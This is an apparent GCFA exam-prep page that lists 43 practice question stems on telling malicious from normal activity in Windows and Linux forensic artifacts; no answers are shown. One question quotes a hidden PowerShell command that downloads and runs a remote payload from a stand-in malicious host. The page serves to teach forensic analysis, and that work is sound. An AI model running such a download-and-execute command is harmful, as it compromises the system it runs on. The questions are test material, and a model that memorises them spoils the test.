GCFA · domain
Identification of Malicious and Normal Activity
This domain tests your ability to distinguish malicious from benign activity using Windows artifacts: Security event logs, Sysmon, memory, and file system metadata. Questions present scenarios like credential dumping, logon anomalies, or botnet triage and ask which artifacts or event IDs confirm the activity. You must know event IDs, logon types, and tool outputs.
Focused practice
Practice Identification of Malicious and Normal Activity questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about Identification of Malicious and Normal Activity
You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
Windows Security event IDs: 4624, 4625, 4672, 4688, and logon types 3, 10
Sysmon event IDs for process creation, network connections, and image loads
Memory analysis artifacts for credential dumping: LSASS access, SAM, and cached credentials
Windows file system metadata: $MFT, $UsnJrnl, prefetch, and shimcache for execution evidence
Watch out for
Common Identification of Malicious and Normal Activity exam traps
- ▸Assuming Event ID 4624 with Logon Type 3 always indicates malicious lateral movement, ignoring legitimate service or scheduled task logons.
- ▸Confusing Event ID 4672 (special privileges assigned) as proof of compromise, when it also occurs for legitimate admin logons.
- ▸Overlooking that Sysmon must be installed and configured; default Windows logs do not capture process creation or network connections.
Question index
All Identification of Malicious and Normal Activity questions (43)
Click any question to see the full explanation, or start a practice session above.
An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?
Easy2While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?
Medium3A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?
Easy4During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?
Medium5During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?
Medium6When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?
Easy7During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?
Medium8Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?
Medium9A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?
Hard10During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?
Medium11A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?
Easy12You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?
Hard13Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?
Medium14An analyst is examining a Linux server that is suspected of being compromised. The analyst runs 'netstat -anp' and observes a process named 'kworker' with PID 1234 listening on TCP port 4444. The analyst knows that legitimate kworker processes are kernel threads and do not open network sockets. Which of the following conclusions is most appropriate?
Medium15An analyst is examining a Linux server suspected of compromise. In /var/log/auth.log, they observe repeated entries of the form: 'sshd[1234]: Accepted publickey for deploy from 10.20.30.40 port 51515 ssh2: RSA SHA256:...' followed by 'sshd[1234]: pam_unix(sshd:session): session opened for user deploy'. No corresponding 'Failed password' entries appear for that source IP. Which interpretation is MOST accurate?
Medium16An analyst observes PowerShell usage with the encoded command flag '-e'. What is the standard forensic approach to de-obfuscate and analyze this activity?
Medium17While triaging a Linux web server, you find that '/usr/bin/sshd' was executed but the running process's parent is 'bash' rather than the systemd service manager, and the process has no associated listening socket. Which conclusion is best supported?
Easy18Which forensic artifact is most useful for determining if a user has recently opened a specific suspicious file, even if that file has since been deleted?
Medium19Which THREE of the following are considered 'living-off-the-land' (LotL) techniques used by attackers to avoid detection?
Hard20A forensic analyst is investigating a Windows workstation that is suspected of being compromised by a fileless malware attack. The analyst has acquired a memory image and a disk image. Which TWO of the following artifacts, when analyzed together, would provide the strongest evidence that a fileless attack has occurred and is currently active? (Choose two.)
Hard21An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?
Medium22During a compromise assessment on a Windows 10 workstation, an analyst runs a volatile memory capture and inspects the process list in Volatility 3. The analyst observes a process named 'lsass.exe' with PID 872, whose parent process is 'winlogon.exe' with PID 640. The executable path recorded for lsass.exe is 'C:\Windows\System32\lsass.exe'. Which conclusion is BEST supported by these artifacts?
Medium23You are reviewing a Windows Server 2019 Security event log and find Event ID 4624 with Logon Type 3 and the 'NTLM' authentication package for a service account, occurring at 02:14 from a workstation that has no corresponding 4648 or 4672 events. Which interpretation is most forensically sound?
Hard24A forensic analyst is examining a Windows Server 2016 system that is suspected of being compromised. The analyst runs 'wevtutil qe Security /f:text /q:"*[System[(EventID=4688)]]"' and notices that many process creation events have the 'Subject Logon ID' field set to '0x3e7'. Which of the following best describes the significance of this finding?
Hard25An analyst identifies a process performing unexpected DNS queries to a top-level domain ending in .xyz every 60 seconds. What is the most effective initial host-based action to confirm malicious beaconing?
Medium26Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?
Hard27You are analyzing a Linux web server and find that /var/log/auth.log contains many 'Failed password' entries followed by a single 'Accepted password' for the account 'deploy' from the same source IP. Shortly after, you see a sudo command adding a new user named 'support' to the sudoers file. Which sequence best describes what occurred?
Hard28Which log category should an analyst examine to identify a potential 'Pass-the-Hash' attack?
Medium29An analyst is reviewing a Windows Server 2019 host and finds that a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' exists under Task Scheduler Library\Microsoft\EdgeUpdate. The task's action launches 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe' with the argument '/ua', and the task's XML shows it was created by 'NT AUTHORITY\SYSTEM'. The XML file in C:\Windows\System32\Tasks was last modified three months ago, matching the install date of Edge. Which assessment is MOST accurate?
Hard30Refer to the exhibit. What is the most critical security concern presented by the second command line?
Hard31An analyst observes a high volume of '4625' events for a single user account. What does this indicate and what is the appropriate initial response?
Easy32When reviewing Windows Event Logs, which event ID indicates that a user has successfully performed an interactive login, and why is this critical for identifying unauthorized lateral movement?
Medium33An analyst is investigating a suspected credential dumping incident on a Windows Server 2016 domain controller. The analyst has acquired a memory image and the Windows event logs. Which TWO of the following artifacts would provide the most direct evidence that LSASS memory was accessed for credential theft? (Choose two.)
Hard34An analyst is reviewing a memory dump from a Windows 10 system using Volatility 3. The analyst runs 'vol.py -f memory.dmp windows.netscan' and observes a TCP connection with a state of 'ESTABLISHED' between the local IP 10.0.0.5:49152 and a remote IP 203.0.113.45:443. The process associated with this connection is 'chrome.exe' (PID 1234). Which of the following should the analyst do next to determine if this connection is malicious?
Medium35Which log artifact provides the most reliable evidence that a user account was used for an interactive remote login rather than a scheduled task?
Medium36An analyst is reconstructing a suspected credential-dumping incident on a Windows 10 host and has already imaged memory. Which TWO artifacts should the analyst examine to determine whether the LSASS process memory was accessed by an unauthorized tool? (Choose two.)
Medium37A forensic analyst is reviewing Windows Security event logs to identify potential malicious activity. The analyst notices a series of Event ID 4625 (An account failed to log on) followed by Event ID 4624 (An account was successfully logged on) for the same user account within a short period. What is the most likely explanation for this pattern?
Easy38A forensic analyst is triaging a Windows 10 endpoint that is suspected of being part of a botnet. The analyst has collected the Security, System, and Application event logs, the Sysmon operational log, and a live memory image. Which TWO of the following artifacts would provide the most direct evidence of periodic command-and-control beaconing behavior? (Choose two.)
Hard39You are analyzing a system and find evidence that a user has executed a PowerShell script that imports the 'Net.WebClient' class. What is the most likely purpose of this script?
Hard40What is the primary forensic value of examining MFT (Master File Table) $Standard_Information vs $File_Name attributes?
Hard41A forensic analyst is reviewing a Windows 10 system and finds that a scheduled task named 'Updater' was created to run a PowerShell script every hour. The task's action is powershell.exe -WindowStyle Hidden -EncodedCommand <base64>. The task was created by a user account that normally does not perform administrative tasks. Which of the following best describes the forensic significance of this finding?
Easy42An analyst is triaging a Linux server and finds a process whose /proc/<pid>/exe symlink points to /tmp/.kwork, and whose parent process is the legitimate cron daemon. The file is owned by root but has no package ownership record. Which interpretation is most appropriate?
Easy43A forensic analyst is reviewing a Windows 10 system suspected of being infected with malware that maintains persistence. The analyst notices a new service named 'Windows Update Helper' with a binary path pointing to C:\Users\Public\updater.exe. The service is set to start automatically. Which artifact would best confirm that this service was created recently and is not a legitimate Windows service?
EasyOther domains
All GCFA exam domains
Frequently asked questions
- What does the Identification of Malicious and Normal Activity domain cover on the GCFA exam?
- You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
- How many questions are in this domain?
- This page lists all 43 Identification of Malicious and Normal Activity questions in the GCFA question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only Identification of Malicious and Normal Activity questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.